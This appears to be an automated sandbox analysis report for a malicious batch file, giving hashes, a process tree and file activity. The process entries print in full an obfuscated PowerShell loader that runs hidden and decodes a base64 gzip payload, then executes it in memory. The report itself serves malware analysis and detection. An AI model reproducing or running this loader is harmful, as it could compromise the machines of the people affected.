File name: | 1.bat |
Full analysis: | https://app.any.run/tasks/22b6a3d3-0264-4f32-9e93-e4c7cce51e29 |
Verdict: | Malicious activity |
Analysis date: | March 22, 2019, 13:23:27 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with very long lines |
MD5: | A12A2025F788C32202CF04A32CE85CAF |
SHA1: | FE3AF863337FACDA3CF74441C9E7499D01443EEC |
SHA256: | 0DC7EBED306D052A8E258B02419D67FD08AC6E8AA4F9AC1CABB1DBF3E76B9D19 |
SSDEEP: | 48:VkW8aMMR33KM0bTzJw1wNBlrSl0vtffOm4JC9CVVYW/:2EnKPm1wNBppZfO/+C7YC |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1920 | cmd /c ""C:\Users\admin\AppData\Local\Temp\1.bat" " | C:\Windows\system32\cmd.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
892 | cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b="powershell.exe";}else{$b=$env:windir+"\syswow64\WindowsPowerShell\v1.0\powershell.exe"};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("H4sIAHVcP1kCA71WbY/aOBD+vJX6H6IKiUSlBFjafZEqnZMQYHlZIEt4O3TyJk7wYmI2cZaXXv/7TSDpstftXa8fLgLF9ow942eemYkXB46gPJBcnU8rId7UpC9v35z1cIhXkpwLB8O4HxWknCdWo/1VeTCeKGdnoJBz6vu9IX2W5Blarw2+wjSYX1/rcRiSQBznxToRKIrI6p5REsmK9Kc0WpCQfLi9fyCOkL5IuT+KdcbvMUvVdjp2FkT6gAI3kbW5gxPnitaaUSHnf/89r8w+lOfF2mOMWSTnrV0kyKroMpZXpK9KYvButyZyvkOdkEfcE8URDc4rxWEQYY904bQn0iFiwd0or8A14BcSEYeBdLxQcsJRLudh2Au5g1w3JBGoF5vBE18SORfEjBWk3+RZan4QB4KuCMgFCfnaIuETdUhUbODAZWRAvLncJZvs1j+7ST7dBFo9ESoFCMlrfna4GzNy3JpXvvc0jaMCz8tYAgZf3755+8bLaEDKk1MCwOhsdhgTcFPu8Yge1D5LpYLUAXtY8HAH09xdGBNlLs0S/GfzuZSLu37dK/z4gHKmDboRrmloKszLTTcG0czm1J3D1jREucjuJ8s/ZppBPBoQYxfgFXUyMsmvwU48Rg5XLWZqXfBNzqcC4hqEER+LBMeCNPt+W21Fxbe9WkyZS0LkQOgi8Aqiqrx05hgaOd8MOmQFWB3n+SQMQGGSaae03WXWkzko5XWGI8i/Xgw55BQki2BG3IKEgoimIhQLfhjmn93txExQB0ciO26upDCm5nQeRCKMHYgeXP3OWhOHYpYgUZAa1CXazqJ+Zjb/Kg46ZowGPpz0BHGAleT+lkg4EYKHx/grRYuI5mrNyAqUDslsMuxD6qb8P7AI+8TN/83DjN1HKidQZBic+AfxtRgXBcmmoYCSkMB6yqVfdOOkKiQO6SFJIyJn+TLTdiKheW7fbPnLsZEQOsPogEgoAA0z5CsNR+RT1RIhYCW/U2+pjuCZNAPWcbQlLaMNLTc78B/S8yY3LtzWzUNDDY3twkPNqNlp9Ix+o1F9urHsqrBqTdHqNUWnNn54sFBjMJyIaRM17mhpOanu1zd0b7WRO9mqn/baflPStvsH3/Umhuf5F541KH80aXuk97VSBbeNWtweaRutVI1qdNPo02F/eWOK+4nN8NBT/XH5CtNtO3ywy7yzbyJUX5w7+xvPri867m7SUK9G1SWqIaQHNdvUeGuihain2ti3ue7z1m7k60gzHUqm/aGp9fumhob1h0fjSvVh7xgvtJFdodP1eLCAuQkutNRStemSPZ/0AaQ6R9gfgI6vV5yFBzrGe6S97/KogpcaRxromNNH8GuyNnsM5HfDCkc2644xak93pqqWJ70qapToqO6j5Ejsa32Moidjb6hl2+Xu6GN34qn2mF2ohn63djxVVTcNo+VMy9vL24uqVnrUV3TF7iuuejW81IJNy+89+W5/dDHYdnf3YG+oqva7hDbAm9xObzs2GQXdKDqhxI+KfQeH0QIzoAoU8SxXTR6aaTnucZrskOXn7rwkYUAYtDRoehntEWPcSZpDUr2hLx27xRzSdgjD88qrI0X6pqg8t4xs6fp6Cp5C/mQEL7ZJ4ItFobQ9L5Wg+Je21RJc+udvqPP1Tv52XCFpIKdonZpiB1NKkmi56DLWKt7/gGWa5Qt4uf+C5fPaP0h/Ct9S4QUG30lfLvwnvH8NhRGmAtQtqFaMHFvnq2CkHDr51jgGCvjhpU/yvXcbiw9d+Aj5CyAqSIRnCgAA"));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2820 | powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b="powershell.exe";}else{$b=$env:windir+"\syswow64\WindowsPowerShell\v1.0\powershell.exe"};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("H4sIAHVcP1kCA71WbY/aOBD+vJX6H6IKiUSlBFjafZEqnZMQYHlZIEt4O3TyJk7wYmI2cZaXXv/7TSDpstftXa8fLgLF9ow942eemYkXB46gPJBcnU8rId7UpC9v35z1cIhXkpwLB8O4HxWknCdWo/1VeTCeKGdnoJBz6vu9IX2W5Blarw2+wjSYX1/rcRiSQBznxToRKIrI6p5REsmK9Kc0WpCQfLi9fyCOkL5IuT+KdcbvMUvVdjp2FkT6gAI3kbW5gxPnitaaUSHnf/89r8w+lOfF2mOMWSTnrV0kyKroMpZXpK9KYvButyZyvkOdkEfcE8URDc4rxWEQYY904bQn0iFiwd0or8A14BcSEYeBdLxQcsJRLudh2Au5g1w3JBGoF5vBE18SORfEjBWk3+RZan4QB4KuCMgFCfnaIuETdUhUbODAZWRAvLncJZvs1j+7ST7dBFo9ESoFCMlrfna4GzNy3JpXvvc0jaMCz8tYAgZf3755+8bLaEDKk1MCwOhsdhgTcFPu8Yge1D5LpYLUAXtY8HAH09xdGBNlLs0S/GfzuZSLu37dK/z4gHKmDboRrmloKszLTTcG0czm1J3D1jREucjuJ8s/ZppBPBoQYxfgFXUyMsmvwU48Rg5XLWZqXfBNzqcC4hqEER+LBMeCNPt+W21Fxbe9WkyZS0LkQOgi8Aqiqrx05hgaOd8MOmQFWB3n+SQMQGGSaae03WXWkzko5XWGI8i/Xgw55BQki2BG3IKEgoimIhQLfhjmn93txExQB0ciO26upDCm5nQeRCKMHYgeXP3OWhOHYpYgUZAa1CXazqJ+Zjb/Kg46ZowGPpz0BHGAleT+lkg4EYKHx/grRYuI5mrNyAqUDslsMuxD6qb8P7AI+8TN/83DjN1HKidQZBic+AfxtRgXBcmmoYCSkMB6yqVfdOOkKiQO6SFJIyJn+TLTdiKheW7fbPnLsZEQOsPogEgoAA0z5CsNR+RT1RIhYCW/U2+pjuCZNAPWcbQlLaMNLTc78B/S8yY3LtzWzUNDDY3twkPNqNlp9Ix+o1F9urHsqrBqTdHqNUWnNn54sFBjMJyIaRM17mhpOanu1zd0b7WRO9mqn/baflPStvsH3/Umhuf5F541KH80aXuk97VSBbeNWtweaRutVI1qdNPo02F/eWOK+4nN8NBT/XH5CtNtO3ywy7yzbyJUX5w7+xvPri867m7SUK9G1SWqIaQHNdvUeGuihain2ti3ue7z1m7k60gzHUqm/aGp9fumhob1h0fjSvVh7xgvtJFdodP1eLCAuQkutNRStemSPZ/0AaQ6R9gfgI6vV5yFBzrGe6S97/KogpcaRxromNNH8GuyNnsM5HfDCkc2644xak93pqqWJ70qapToqO6j5Ejsa32Moidjb6hl2+Xu6GN34qn2mF2ohn63djxVVTcNo+VMy9vL24uqVnrUV3TF7iuuejW81IJNy+89+W5/dDHYdnf3YG+oqva7hDbAm9xObzs2GQXdKDqhxI+KfQeH0QIzoAoU8SxXTR6aaTnucZrskOXn7rwkYUAYtDRoehntEWPcSZpDUr2hLx27xRzSdgjD88qrI0X6pqg8t4xs6fp6Cp5C/mQEL7ZJ4ItFobQ9L5Wg+Je21RJc+udvqPP1Tv52XCFpIKdonZpiB1NKkmi56DLWKt7/gGWa5Qt4uf+C5fPaP0h/Ct9S4QUG30lfLvwnvH8NhRGmAtQtqFaMHFvnq2CkHDr51jgGCvjhpU/yvXcbiw9d+Aj5CyAqSIRnCgAA"));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2820 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NT9RKPQA3YWQ4PUFTRZA.temp | — | |
MD5:— | SHA256:— | |||
2820 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:7100C9D54A32DFE02751A9E1BC41F804 | SHA256:80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C | |||
2820 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFf88de.TMP | binary | |
MD5:7100C9D54A32DFE02751A9E1BC41F804 | SHA256:80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C |